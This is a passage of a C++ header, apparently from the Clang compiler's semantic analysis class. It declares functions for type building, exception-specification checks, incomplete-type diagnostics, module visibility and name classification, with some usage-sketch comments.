QualType BuildQualifiedType(QualType T, SourceLocation Loc, Qualifiers Qs,
const DeclSpec *DS = nullptr);
QualType BuildQualifiedType(QualType T, SourceLocation Loc, unsigned CVRA,
const DeclSpec *DS = nullptr);
QualType BuildPointerType(QualType T,
SourceLocation Loc, DeclarationName Entity);
QualType BuildReferenceType(QualType T, bool LValueRef,
SourceLocation Loc, DeclarationName Entity);
QualType BuildArrayType(QualType T, ArrayType::ArraySizeModifier ASM,
Expr *ArraySize, unsigned Quals,
SourceRange Brackets, DeclarationName Entity);
QualType BuildVectorType(QualType T, Expr *VecSize, SourceLocation AttrLoc);
QualType BuildExtVectorType(QualType T, Expr *ArraySize,
SourceLocation AttrLoc);
QualType BuildAddressSpaceAttr(QualType &T, LangAS ASIdx, Expr *AddrSpace,
SourceLocation AttrLoc);
/// Same as above, but constructs the AddressSpace index if not provided.
QualType BuildAddressSpaceAttr(QualType &T, Expr *AddrSpace,
SourceLocation AttrLoc);
bool CheckQualifiedFunctionForTypeId(QualType T, SourceLocation Loc);
bool CheckFunctionReturnType(QualType T, SourceLocation Loc);
/// Build a function type.
///
/// This routine checks the function type according to C++ rules and
/// under the assumption that the result type and parameter types have
/// just been instantiated from a template. It therefore duplicates
/// some of the behavior of GetTypeForDeclarator, but in a much
/// simpler form that is only suitable for this narrow use case.
///
/// \param T The return type of the function.
///
/// \param ParamTypes The parameter types of the function. This array
/// will be modified to account for adjustments to the types of the
/// function parameters.
///
/// \param Loc The location of the entity whose type involves this
/// function type or, if there is no such entity, the location of the
/// type that will have function type.
///
/// \param Entity The name of the entity that involves the function
/// type, if known.
///
/// \param EPI Extra information about the function type. Usually this will
/// be taken from an existing function with the same prototype.
///
/// \returns A suitable function type, if there are no errors. The
/// unqualified type will always be a FunctionProtoType.
/// Otherwise, returns a NULL type.
QualType BuildFunctionType(QualType T,
MutableArrayRef<QualType> ParamTypes,
SourceLocation Loc, DeclarationName Entity,
const FunctionProtoType::ExtProtoInfo &EPI);
QualType BuildMemberPointerType(QualType T, QualType Class,
SourceLocation Loc,
DeclarationName Entity);
QualType BuildBlockPointerType(QualType T,
SourceLocation Loc, DeclarationName Entity);
QualType BuildParenType(QualType T);
QualType BuildAtomicType(QualType T, SourceLocation Loc);
QualType BuildReadPipeType(QualType T,
SourceLocation Loc);
QualType BuildWritePipeType(QualType T,
SourceLocation Loc);
TypeSourceInfo *GetTypeForDeclarator(Declarator &D, Scope *S);
TypeSourceInfo *GetTypeForDeclaratorCast(Declarator &D, QualType FromTy);
/// Package the given type and TSI into a ParsedType.
ParsedType CreateParsedType(QualType T, TypeSourceInfo *TInfo);
DeclarationNameInfo GetNameForDeclarator(Declarator &D);
DeclarationNameInfo GetNameFromUnqualifiedId(const UnqualifiedId &Name);
static QualType GetTypeFromParser(ParsedType Ty,
TypeSourceInfo **TInfo = nullptr);
CanThrowResult canThrow(const Stmt *E);
const FunctionProtoType *ResolveExceptionSpec(SourceLocation Loc,
const FunctionProtoType *FPT);
void UpdateExceptionSpec(FunctionDecl *FD,
const FunctionProtoType::ExceptionSpecInfo &ESI);
bool CheckSpecifiedExceptionType(QualType &T, SourceRange Range);
bool CheckDistantExceptionSpec(QualType T);
bool CheckEquivalentExceptionSpec(FunctionDecl *Old, FunctionDecl *New);
bool CheckEquivalentExceptionSpec(
const FunctionProtoType *Old, SourceLocation OldLoc,
const FunctionProtoType *New, SourceLocation NewLoc);
bool CheckEquivalentExceptionSpec(
const PartialDiagnostic &DiagID, const PartialDiagnostic & NoteID,
const FunctionProtoType *Old, SourceLocation OldLoc,
const FunctionProtoType *New, SourceLocation NewLoc);
bool handlerCanCatch(QualType HandlerType, QualType ExceptionType);
bool CheckExceptionSpecSubset(const PartialDiagnostic &DiagID,
const PartialDiagnostic &NestedDiagID,
const PartialDiagnostic &NoteID,
const PartialDiagnostic &NoThrowDiagID,
const FunctionProtoType *Superset,
SourceLocation SuperLoc,
const FunctionProtoType *Subset,
SourceLocation SubLoc);
bool CheckParamExceptionSpec(const PartialDiagnostic &NestedDiagID,
const PartialDiagnostic &NoteID,
const FunctionProtoType *Target,
SourceLocation TargetLoc,
const FunctionProtoType *Source,
SourceLocation SourceLoc);
TypeResult ActOnTypeName(Scope *S, Declarator &D);
/// The parser has parsed the context-sensitive type 'instancetype'
/// in an Objective-C message declaration. Return the appropriate type.
ParsedType ActOnObjCInstanceType(SourceLocation Loc);
/// Abstract class used to diagnose incomplete types.
struct TypeDiagnoser {
TypeDiagnoser() {}
virtual void diagnose(Sema &S, SourceLocation Loc, QualType T) = 0;
virtual ~TypeDiagnoser() {}
};
static int getPrintable(int I) { return I; }
static unsigned getPrintable(unsigned I) { return I; }
static bool getPrintable(bool B) { return B; }
static const char * getPrintable(const char *S) { return S; }
static StringRef getPrintable(StringRef S) { return S; }
static const std::string &getPrintable(const std::string &S) { return S; }
static const IdentifierInfo *getPrintable(const IdentifierInfo *II) {
return II;
}
static DeclarationName getPrintable(DeclarationName N) { return N; }
static QualType getPrintable(QualType T) { return T; }
static SourceRange getPrintable(SourceRange R) { return R; }
static SourceRange getPrintable(SourceLocation L) { return L; }
static SourceRange getPrintable(const Expr *E) { return E->getSourceRange(); }
static SourceRange getPrintable(TypeLoc TL) { return TL.getSourceRange();}
template <typename... Ts> class BoundTypeDiagnoser : public TypeDiagnoser {
unsigned DiagID;
std::tuple<const Ts &...> Args;
template <std::size_t... Is>
void emit(const SemaDiagnosticBuilder &DB,
std::index_sequence<Is...>) const {
// Apply all tuple elements to the builder in order.
bool Dummy[] = {false, (DB << getPrintable(std::get<Is>(Args)))...};
(void)Dummy;
}
public:
BoundTypeDiagnoser(unsigned DiagID, const Ts &...Args)
: TypeDiagnoser(), DiagID(DiagID), Args(Args...) {
assert(DiagID != 0 && "no diagnostic for type diagnoser");
}
void diagnose(Sema &S, SourceLocation Loc, QualType T) override {
const SemaDiagnosticBuilder &DB = S.Diag(Loc, DiagID);
emit(DB, std::index_sequence_for<Ts...>());
DB << T;
}
};
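// Editorial usage sketch (`DiagID` and `Name` are hypothetical; the %0-style
// argument order must match the chosen diagnostic): bind the extra arguments
// up front, and emit only if the type turns out to be incomplete.
//
//   BoundTypeDiagnoser<DeclarationName> Diagnoser(DiagID, Name);
//   RequireCompleteType(Loc, T, Diagnoser); // appends T as the final argument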
/// Do a check to make sure \p Name looks like a legal swift_name
/// attribute for the decl \p D. Raise a diagnostic if the name is invalid
/// for the given declaration.
///
/// For a function, this will validate a compound Swift name,
/// e.g. <code>init(foo:bar:baz:)</code> or <code>controllerForName(_:)</code>,
/// and the function will output the number of parameter names, and whether
/// this is a single-arg initializer.
///
/// For a type, enum constant, property, or variable declaration, this will
/// validate either a simple identifier, or a qualified
/// <code>context.identifier</code> name.
///
/// \returns true if the name is a valid swift name for \p D, false otherwise.
bool DiagnoseSwiftName(Decl *D, StringRef Name,
SourceLocation ArgLoc,
const IdentifierInfo *AttrName);
private:
/// Methods for marking which expressions involve dereferencing a pointer
/// marked with the 'noderef' attribute. Expressions are checked bottom up as
/// they are parsed, meaning that a noderef pointer may not be accessed. For
/// example, in `&*p` where `p` is a noderef pointer, we will first parse the
/// `*p`, but need to check that `address of` is called on it. This requires
/// keeping a container of all pending expressions and checking whether the
/// address of each is eventually taken.
void CheckSubscriptAccessOfNoDeref(const ArraySubscriptExpr *E);
void CheckAddressOfNoDeref(const Expr *E);
void CheckMemberAccessOfNoDeref(const MemberExpr *E);
bool RequireCompleteTypeImpl(SourceLocation Loc, QualType T,
TypeDiagnoser *Diagnoser);
struct ModuleScope {
SourceLocation BeginLoc;
clang::Module *Module = nullptr;
bool ModuleInterface = false;
bool ImplicitGlobalModuleFragment = false;
VisibleModuleSet OuterVisibleModules;
};
/// The modules we're currently parsing.
llvm::SmallVector<ModuleScope, 16> ModuleScopes;
/// Namespace definitions that we will export when they finish.
llvm::SmallPtrSet<const NamespaceDecl*, 8> DeferredExportedNamespaces;
/// Get the module whose scope we are currently within.
Module *getCurrentModule() const {
return ModuleScopes.empty() ? nullptr : ModuleScopes.back().Module;
}
VisibleModuleSet VisibleModules;
public:
/// Get the module owning an entity.
Module *getOwningModule(Decl *Entity) { return Entity->getOwningModule(); }
/// Make a merged definition of an existing hidden definition \p ND
/// visible at the specified location.
void makeMergedDefinitionVisible(NamedDecl *ND);
bool isModuleVisible(const Module *M, bool ModulePrivate = false);
/// Determine whether a declaration is visible to name lookup.
bool isVisible(const NamedDecl *D) {
return !D->isHidden() || isVisibleSlow(D);
}
/// Determine whether any declaration of an entity is visible.
bool
hasVisibleDeclaration(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules = nullptr) {
return isVisible(D) || hasVisibleDeclarationSlow(D, Modules);
}
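// Visibility sketch: isVisible() is a cheap flag test with a slow path that
// consults VisibleModules. For example, given a struct S exported from
// module A, a translation unit that has not yet imported A sees
// isVisible(S) == false and name lookup treats S as undeclared;
// hasVisibleDeclaration() can then report (via Modules) which imports would
// make it visible.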
bool hasVisibleDeclarationSlow(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules);
bool hasVisibleMergedDefinition(NamedDecl *Def);
bool hasMergedDefinitionInCurrentModule(NamedDecl *Def);
/// Determine if \p D and \p Suggested have a structurally compatible
/// layout as described in C11 6.2.7/1.
bool hasStructuralCompatLayout(Decl *D, Decl *Suggested);
/// Determine if \p D has a visible definition. If not, suggest a declaration
/// that should be made visible to expose the definition.
bool hasVisibleDefinition(NamedDecl *D, NamedDecl **Suggested,
bool OnlyNeedComplete = false);
bool hasVisibleDefinition(const NamedDecl *D) {
NamedDecl *Hidden;
return hasVisibleDefinition(const_cast<NamedDecl*>(D), &Hidden);
}
/// Determine if the template parameter \p D has a visible default argument.
bool
hasVisibleDefaultArgument(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if there is a visible declaration of \p D that is an explicit
/// specialization declaration for a specialization of a template. (For a
/// member specialization, use hasVisibleMemberSpecialization.)
bool hasVisibleExplicitSpecialization(
const NamedDecl *D, llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if there is a visible declaration of \p D that is a member
/// specialization declaration (as opposed to an instantiated declaration).
bool hasVisibleMemberSpecialization(
const NamedDecl *D, llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if \p A and \p B are equivalent internal linkage declarations
/// from different modules, and thus an ambiguity error can be downgraded to
/// an extension warning.
bool isEquivalentInternalLinkageDeclaration(const NamedDecl *A,
const NamedDecl *B);
void diagnoseEquivalentInternalLinkageDeclarations(
SourceLocation Loc, const NamedDecl *D,
ArrayRef<const NamedDecl *> Equiv);
bool isUsualDeallocationFunction(const CXXMethodDecl *FD);
bool isCompleteType(SourceLocation Loc, QualType T) {
return !RequireCompleteTypeImpl(Loc, T, nullptr);
}
bool RequireCompleteType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser);
bool RequireCompleteType(SourceLocation Loc, QualType T,
unsigned DiagID);
template <typename... Ts>
bool RequireCompleteType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteType(Loc, T, Diagnoser);
}
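// Typical call-site sketch (the diagnostic ID is illustrative): a true
// result means the type was incomplete and the diagnostic has already been
// emitted, so the caller just bails out.
//
//   if (RequireCompleteType(Loc, T, diag::err_incomplete_type))
//     return true;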
void completeExprArrayBound(Expr *E);
bool RequireCompleteExprType(Expr *E, TypeDiagnoser &Diagnoser);
bool RequireCompleteExprType(Expr *E, unsigned DiagID);
template <typename... Ts>
bool RequireCompleteExprType(Expr *E, unsigned DiagID, const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteExprType(E, Diagnoser);
}
bool RequireLiteralType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser);
bool RequireLiteralType(SourceLocation Loc, QualType T, unsigned DiagID);
template <typename... Ts>
bool RequireLiteralType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireLiteralType(Loc, T, Diagnoser);
}
QualType getElaboratedType(ElaboratedTypeKeyword Keyword,
const CXXScopeSpec &SS, QualType T,
TagDecl *OwnedTagDecl = nullptr);
QualType BuildTypeofExprType(Expr *E, SourceLocation Loc);
/// If AsUnevaluated is false, E is treated as though it were an evaluated
/// context, such as when building a type for decltype(auto).
QualType BuildDecltypeType(Expr *E, SourceLocation Loc,
bool AsUnevaluated = true);
QualType BuildUnaryTransformType(QualType BaseType,
UnaryTransformType::UTTKind UKind,
SourceLocation Loc);
//===--------------------------------------------------------------------===//
// Symbol table / Decl tracking callbacks: SemaDecl.cpp.
//
struct SkipBodyInfo {
SkipBodyInfo()
: ShouldSkip(false), CheckSameAsPrevious(false), Previous(nullptr),
New(nullptr) {}
bool ShouldSkip;
bool CheckSameAsPrevious;
NamedDecl *Previous;
NamedDecl *New;
};
DeclGroupPtrTy ConvertDeclToDeclGroup(Decl *Ptr, Decl *OwnedType = nullptr);
void DiagnoseUseOfUnimplementedSelectors();
bool isSimpleTypeSpecifier(tok::TokenKind Kind) const;
ParsedType getTypeName(const IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec *SS = nullptr,
bool isClassName = false, bool HasTrailingDot = false,
ParsedType ObjectType = nullptr,
bool IsCtorOrDtorName = false,
bool WantNontrivialTypeSourceInfo = false,
bool IsClassTemplateDeductionContext = true,
IdentifierInfo **CorrectedII = nullptr);
TypeSpecifierType isTagName(IdentifierInfo &II, Scope *S);
bool isMicrosoftMissingTypename(const CXXScopeSpec *SS, Scope *S);
void DiagnoseUnknownTypeName(IdentifierInfo *&II,
SourceLocation IILoc,
Scope *S,
CXXScopeSpec *SS,
ParsedType &SuggestedType,
bool IsTemplateName = false);
/// Attempt to behave like MSVC in situations where lookup of an unqualified
/// type name has failed in a dependent context. In these situations, we
/// automatically form a DependentTypeName that will retry lookup in a related
/// scope during instantiation.
ParsedType ActOnMSVCUnknownTypeName(const IdentifierInfo &II,
SourceLocation NameLoc,
bool IsTemplateTypeArg);
/// Describes the result of the name lookup and resolution performed
/// by \c ClassifyName().
enum NameClassificationKind {
/// This name is not a type or template in this context, but might be
/// something else.
NC_Unknown,
/// Classification failed; an error has been produced.
NC_Error,
/// The name has been typo-corrected to a keyword.
NC_Keyword,
/// The name was classified as a type.
NC_Type,
/// The name was classified as a specific non-type, non-template
/// declaration. ActOnNameClassifiedAsNonType should be called to
/// convert the declaration to an expression.
NC_NonType,
/// The name was classified as an ADL-only function name.
/// ActOnNameClassifiedAsUndeclaredNonType should be called to convert the
/// result to an expression.
NC_UndeclaredNonType,
/// The name denotes a member of a dependent type that could not be
/// resolved. ActOnNameClassifiedAsDependentNonType should be called to
/// convert the result to an expression.
NC_DependentNonType,
/// The name was classified as a non-type, and an expression representing
/// that name has been formed.
NC_ContextIndependentExpr,
/// The name was classified as a template whose specializations are types.
NC_TypeTemplate,
/// The name was classified as a variable template name.
NC_VarTemplate,
/// The name was classified as a function template name.
NC_FunctionTemplate,
/// The name was classified as an ADL-only function template name.
NC_UndeclaredTemplate,
};
class NameClassification {
NameClassificationKind Kind;
union {
ExprResult Expr;
NamedDecl *NonTypeDecl;
TemplateName Template;
ParsedType Type;
};
explicit NameClassification(NameClassificationKind Kind) : Kind(Kind) {}
public:
NameClassification(ParsedType Type) : Kind(NC_Type), Type(Type) {}
NameClassification(const IdentifierInfo *Keyword) : Kind(NC_Keyword) {}
static NameClassification Error() {
return NameClassification(NC_Error);
}
static NameClassification Unknown() {
return NameClassification(NC_Unknown);
}
static NameClassification ContextIndependentExpr(ExprResult E) {
NameClassification Result(NC_ContextIndependentExpr);
Result.Expr = E;
return Result;
}
static NameClassification NonType(NamedDecl *D) {
NameClassification Result(NC_NonType);
Result.NonTypeDecl = D;
return Result;
}
static NameClassification UndeclaredNonType() {
return NameClassification(NC_UndeclaredNonType);
}
static NameClassification DependentNonType() {
return NameClassification(NC_DependentNonType);
}
static NameClassification TypeTemplate(TemplateName Name) {
NameClassification Result(NC_TypeTemplate);
Result.Template = Name;
return Result;
}
static NameClassification VarTemplate(TemplateName Name) {
NameClassification Result(NC_VarTemplate);
Result.Template = Name;
return Result;
}
static NameClassification FunctionTemplate(TemplateName Name) {
NameClassification Result(NC_FunctionTemplate);
Result.Template = Name;
return Result;
}
static NameClassification UndeclaredTemplate(TemplateName Name) {
NameClassification Result(NC_UndeclaredTemplate);
Result.Template = Name;
return Result;
}
NameClassificationKind getKind() const { return Kind; }
ExprResult getExpression() const {
assert(Kind == NC_ContextIndependentExpr);
return Expr;
}
ParsedType getType() const {
assert(Kind == NC_Type);
return Type;
}
NamedDecl *getNonTypeDecl() const {
assert(Kind == NC_NonType);
return NonTypeDecl;
}
TemplateName getTemplateName() const {
assert(Kind == NC_TypeTemplate || Kind == NC_FunctionTemplate ||
Kind == NC_VarTemplate || Kind == NC_UndeclaredTemplate);
return Template;
}
TemplateNameKind getTemplateNameKind() const {
switch (Kind) {
case NC_TypeTemplate:
return TNK_Type_template;
case NC_FunctionTemplate:
return TNK_Function_template;
case NC_VarTemplate:
return TNK_Var_template;
case NC_UndeclaredTemplate:
return TNK_Undeclared_template;
default:
llvm_unreachable("unsupported name classification.");
}
}
};
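// Consumption sketch (hypothetical parser-side code; Actions, II, NextTok,
// and Res are placeholders): the parser switches on the classification kind
// and calls the matching ActOnNameClassifiedAs* hook declared below.
//
//   Sema::NameClassification C =
//       Actions.ClassifyName(getCurScope(), SS, II, Loc, NextTok);
//   switch (C.getKind()) {
//   case Sema::NC_Type:
//     // treat II as the type C.getType()
//     break;
//   case Sema::NC_NonType:
//     Res = Actions.ActOnNameClassifiedAsNonType(
//         getCurScope(), SS, C.getNonTypeDecl(), Loc, NextTok);
//     break;
//   // ... remaining kinds as documented on NameClassificationKind ...
//   }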
/// Perform name lookup on the given name, classifying it based on
/// the results of name lookup and the following token.
///
/// This routine is used by the parser to resolve identifiers and help direct
/// parsing. When the identifier cannot be found, this routine will attempt
/// to correct the typo and classify based on the resulting name.
///
/// \param S The scope in which we're performing name lookup.
///
/// \param SS The nested-name-specifier that precedes the name.
///
/// \param Name The identifier. If typo correction finds an alternative name,
/// this pointer parameter will be updated accordingly.
///
/// \param NameLoc The location of the identifier.
///
/// \param NextToken The token following the identifier. Used to help
/// disambiguate the name.
///
/// \param CCC The correction callback, if typo correction is desired.
NameClassification ClassifyName(Scope *S, CXXScopeSpec &SS,
IdentifierInfo *&Name, SourceLocation NameLoc,
const Token &NextToken,
CorrectionCandidateCallback *CCC = nullptr);
/// Act on the result of classifying a name as an undeclared (ADL-only)
/// non-type declaration.
ExprResult ActOnNameClassifiedAsUndeclaredNonType(IdentifierInfo *Name,
SourceLocation NameLoc);
/// Act on the result of classifying a name as an undeclared member of a
/// dependent base class.
ExprResult ActOnNameClassifiedAsDependentNonType(const CXXScopeSpec &SS,
IdentifierInfo *Name,
SourceLocation NameLoc,
bool IsAddressOfOperand);
/// Act on the result of classifying a name as a specific non-type
/// declaration.
ExprResult ActOnNameClassifiedAsNonType(Scope *S, const CXXScopeSpec &SS,
NamedDecl *Found,
SourceLocation NameLoc,
const Token &NextToken);
/// Describes the detailed kind of a template name. Used in diagnostics.
enum class TemplateNameKindForDiagnostics {
ClassTemplate,
FunctionTemplate,
VarTemplate,
AliasTemplate,
TemplateTemplateParam,
Concept,
DependentTemplate
};
TemplateNameKindForDiagnostics
getTemplateNameKindForDiagnostics(TemplateName Name);
/// Determine whether it's plausible that E was intended to be a
/// template-name.
bool mightBeIntendedToBeTemplateName(ExprResult E, bool &Dependent) {
if (!getLangOpts().CPlusPlus || E.isInvalid())
return false;
Dependent = false;
if (auto *DRE = dyn_cast<DeclRefExpr>(E.get()))
return !DRE->hasExplicitTemplateArgs();
if (auto *ME = dyn_cast<MemberExpr>(E.get()))
return !ME->hasExplicitTemplateArgs();
Dependent = true;
if (auto *DSDRE = dyn_cast<DependentScopeDeclRefExpr>(E.get()))
return !DSDRE->hasExplicitTemplateArgs();
if (auto *DSME = dyn_cast<CXXDependentScopeMemberExpr>(E.get()))
return !DSME->hasExplicitTemplateArgs();
// Any additional cases recognized here should also be handled by
// diagnoseExprIntendedAsTemplateName.
return false;
}
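// Motivating sketch: in "f<int>(0)" where f is a plain variable, the parser
// first parses "f < int" as a comparison; when the construct fails to make
// sense, this predicate recognizes the DeclRefExpr with no explicit
// template arguments so diagnoseExprIntendedAsTemplateName (below) can emit
// a targeted "f is not a template" diagnostic instead of a cascade of parse
// errors.
//
//   int f;
//   f<int>(0); // mightBeIntendedToBeTemplateName == true, Dependent == false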
void diagnoseExprIntendedAsTemplateName(Scope *S, ExprResult TemplateName,
SourceLocation Less,
SourceLocation Greater);
Decl *ActOnDeclarator(Scope *S, Declarator &D);
NamedDecl *HandleDeclarator(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParameterLists);
void RegisterLocallyScopedExternCDecl(NamedDecl *ND, Scope *S);
bool DiagnoseClassNameShadow(DeclContext *DC, DeclarationNameInfo Info);
bool diagnoseQualifiedDeclaration(CXXScopeSpec &SS, DeclContext *DC,
DeclarationName Name, SourceLocation Loc,
bool IsTemplateId);
void
diagnoseIgnoredQualifiers(unsigned DiagID, unsigned Quals,
SourceLocation FallbackLoc,
SourceLocation ConstQualLoc = SourceLocation(),
SourceLocation VolatileQualLoc = SourceLocation(),
SourceLocation RestrictQualLoc = SourceLocation(),
SourceLocation AtomicQualLoc = SourceLocation(),
SourceLocation UnalignedQualLoc = SourceLocation());
void diagnosePointerAuthDisabled(SourceLocation loc, SourceRange range);
bool checkConstantPointerAuthKey(Expr *keyExpr, unsigned &key);
static bool adjustContextForLocalExternDecl(DeclContext *&DC);
void DiagnoseFunctionSpecifiers(const DeclSpec &DS);
NamedDecl *getShadowedDeclaration(const TypedefNameDecl *D,
const LookupResult &R);
NamedDecl *getShadowedDeclaration(const VarDecl *D, const LookupResult &R);
void CheckShadow(NamedDecl *D, NamedDecl *ShadowedDecl,
const LookupResult &R);
void CheckShadow(Scope *S, VarDecl *D);
/// Warn if 'E', which is an expression that is about to be modified, refers
/// to a shadowing declaration.
void CheckShadowingDeclModification(Expr *E, SourceLocation Loc);
void DiagnoseShadowingLambdaDecls(const sema::LambdaScopeInfo *LSI);
private:
/// Map of current shadowing declarations to shadowed declarations. Warn if
/// it looks like the user is trying to modify the shadowing declaration.
llvm::DenseMap<const NamedDecl *, const NamedDecl *> ShadowingDecls;
public:
void CheckCastAlign(Expr *Op, QualType T, SourceRange TRange);
void handleTagNumbering(const TagDecl *Tag, Scope *TagScope);
void setTagNameForLinkagePurposes(TagDecl *TagFromDeclSpec,
TypedefNameDecl *NewTD);
void CheckTypedefForVariablyModifiedType(Scope *S, TypedefNameDecl *D);
NamedDecl* ActOnTypedefDeclarator(Scope* S, Declarator& D, DeclContext* DC,
TypeSourceInfo *TInfo,
LookupResult &Previous);
NamedDecl* ActOnTypedefNameDecl(Scope* S, DeclContext* DC, TypedefNameDecl *D,
LookupResult &Previous, bool &Redeclaration);
NamedDecl *ActOnVariableDeclarator(Scope *S, Declarator &D, DeclContext *DC,
TypeSourceInfo *TInfo,
LookupResult &Previous,
MultiTemplateParamsArg TemplateParamLists,
bool &AddToScope,
ArrayRef<BindingDecl *> Bindings = None);
NamedDecl *
ActOnDecompositionDeclarator(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParamLists);
// Returns true if the variable declaration is a redeclaration
bool CheckVariableDeclaration(VarDecl *NewVD, LookupResult &Previous);
void CheckVariableDeclarationType(VarDecl *NewVD);
bool DeduceVariableDeclarationType(VarDecl *VDecl, bool DirectInit,
Expr *Init);
void CheckCompleteVariableDeclaration(VarDecl *VD);
void CheckCompleteDecompositionDeclaration(DecompositionDecl *DD);
void MaybeSuggestAddingStaticToDecl(const FunctionDecl *D);
NamedDecl* ActOnFunctionDeclarator(Scope* S, Declarator& D, DeclContext* DC,
TypeSourceInfo *TInfo,
LookupResult &Previous,
MultiTemplateParamsArg TemplateParamLists,
bool &AddToScope);
bool AddOverriddenMethods(CXXRecordDecl *DC, CXXMethodDecl *MD);
enum class CheckConstexprKind {
/// Diagnose issues that are non-constant or that are extensions.
Diagnose,
/// Identify whether this function satisfies the formal rules for constexpr
/// functions in the current language mode (with no extensions).
CheckValid
};
bool CheckConstexprFunctionDefinition(const FunctionDecl *FD,
CheckConstexprKind Kind);
void DiagnoseHiddenVirtualMethods(CXXMethodDecl *MD);
void FindHiddenVirtualMethods(CXXMethodDecl *MD,
SmallVectorImpl<CXXMethodDecl*> &OverloadedMethods);
void NoteHiddenVirtualMethods(CXXMethodDecl *MD,
SmallVectorImpl<CXXMethodDecl*> &OverloadedMethods);
// Returns true if the function declaration is a redeclaration
bool CheckFunctionDeclaration(Scope *S,
FunctionDecl *NewFD, LookupResult &Previous,
bool IsMemberSpecialization);
bool shouldLinkDependentDeclWithPrevious(Decl *D, Decl *OldDecl);
bool canFullyTypeCheckRedeclaration(ValueDecl *NewD, ValueDecl *OldD,
QualType NewT, QualType OldT);
void CheckMain(FunctionDecl *FD, const DeclSpec &D);
void CheckMSVCRTEntryPoint(FunctionDecl *FD);
Attr *getImplicitCodeSegOrSectionAttrForFunction(const FunctionDecl *FD,
bool IsDefinition);
void CheckFunctionOrTemplateParamDeclarator(Scope *S, Declarator &D);
Decl *ActOnParamDeclarator(Scope *S, Declarator &D);
ParmVarDecl *BuildParmVarDeclForTypedef(DeclContext *DC,
SourceLocation Loc,
QualType T);
QualType adjustParameterTypeForObjCAutoRefCount(QualType T,
SourceLocation NameLoc,
TypeSourceInfo *TSInfo);
ParmVarDecl *CheckParameter(DeclContext *DC, SourceLocation StartLoc,
SourceLocation NameLoc, IdentifierInfo *Name,
QualType T, TypeSourceInfo *TSInfo,
StorageClass SC);
void ActOnParamDefaultArgument(Decl *param,
SourceLocation EqualLoc,
Expr *defarg);
void ActOnParamUnparsedDefaultArgument(Decl *param,
SourceLocation EqualLoc,
SourceLocation ArgLoc);
void ActOnParamDefaultArgumentError(Decl *param, SourceLocation EqualLoc);
bool SetParamDefaultArgument(ParmVarDecl *Param, Expr *DefaultArg,
SourceLocation EqualLoc);
// Contexts where using non-trivial C union types can be disallowed. This is
// passed to err_non_trivial_c_union_in_invalid_context.
enum NonTrivialCUnionContext {
// Function parameter.
NTCUC_FunctionParam,
// Function return.
NTCUC_FunctionReturn,
// Default-initialized object.
NTCUC_DefaultInitializedObject,
// Variable with automatic storage duration.
NTCUC_AutoVar,
// Initializer expression that might copy from another object.
NTCUC_CopyInit,
// Assignment.
NTCUC_Assignment,
// Compound literal.
NTCUC_CompoundLiteral,
// Block capture.
NTCUC_BlockCapture,
// lvalue-to-rvalue conversion of volatile type.
NTCUC_LValueToRValueVolatile,
};
/// Emit diagnostics if the initializer or any of its explicit or
/// implicitly-generated subexpressions require copying or
/// default-initializing a type that is or contains a C union type that is
/// non-trivial to copy or default-initialize.
void checkNonTrivialCUnionInInitializer(const Expr *Init, SourceLocation Loc);
// These flags are passed to checkNonTrivialCUnion.
enum NonTrivialCUnionKind {
NTCUK_Init = 0x1,
NTCUK_Destruct = 0x2,
NTCUK_Copy = 0x4,
};
/// Emit diagnostics if a non-trivial C union type or a struct that contains
/// a non-trivial C union is used in an invalid context.
void checkNonTrivialCUnion(QualType QT, SourceLocation Loc,
NonTrivialCUnionContext UseContext,
unsigned NonTrivialKind);
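// Example of a non-trivial C union under ARC (sketch): the __strong 'id'
// member makes default-initialization, copying, and destruction of U
// non-trivial, so uses in the contexts enumerated above are diagnosed.
//
//   union U { id Obj; int N; };  // non-trivial to init/copy/destroy
//   void take(union U u);        // NTCUC_FunctionParam
//   union U make(void);          // NTCUC_FunctionReturn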
void AddInitializerToDecl(Decl *dcl, Expr *init, bool DirectInit);
void ActOnUninitializedDecl(Decl *dcl);
void ActOnInitializerError(Decl *Dcl);
void ActOnPureSpecifier(Decl *D, SourceLocation PureSpecLoc);
void ActOnCXXForRangeDecl(Decl *D);
StmtResult ActOnCXXForRangeIdentifier(Scope *S, SourceLocation IdentLoc,
IdentifierInfo *Ident,
ParsedAttributes &Attrs,
SourceLocation AttrEnd);
void SetDeclDeleted(Decl *dcl, SourceLocation DelLoc);
void SetDeclDefaulted(Decl *dcl, SourceLocation DefaultLoc);
void CheckStaticLocalForDllExport(VarDecl *VD);
void FinalizeDeclaration(Decl *D);
DeclGroupPtrTy FinalizeDeclaratorGroup(Scope *S, const DeclSpec &DS,
ArrayRef<Decl *> Group);
DeclGroupPtrTy BuildDeclaratorGroup(MutableArrayRef<Decl *> Group);
/// Should be called on all declarations that might have attached
/// documentation comments.
void ActOnDocumentableDecl(Decl *D);
void ActOnDocumentableDecls(ArrayRef<Decl *> Group);
void ActOnFinishKNRParamDeclarations(Scope *S, Declarator &D,
SourceLocation LocAfterDecls);
void CheckForFunctionRedefinition(
FunctionDecl *FD, const FunctionDecl *EffectiveDefinition = nullptr,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnStartOfFunctionDef(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParamLists,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnStartOfFunctionDef(Scope *S, Decl *D,
SkipBodyInfo *SkipBody = nullptr);
void ActOnStartOfObjCMethodDef(Scope *S, Decl *D);
bool isObjCMethodDecl(Decl *D) {
return D && isa<ObjCMethodDecl>(D);
}
/// Determine whether we can delay parsing the body of a function or
/// function template until it is used, assuming we don't care about emitting
/// code for that function.
///
/// This will be \c false if we may need the body of the function in the
/// middle of parsing an expression (where it's impractical to switch to
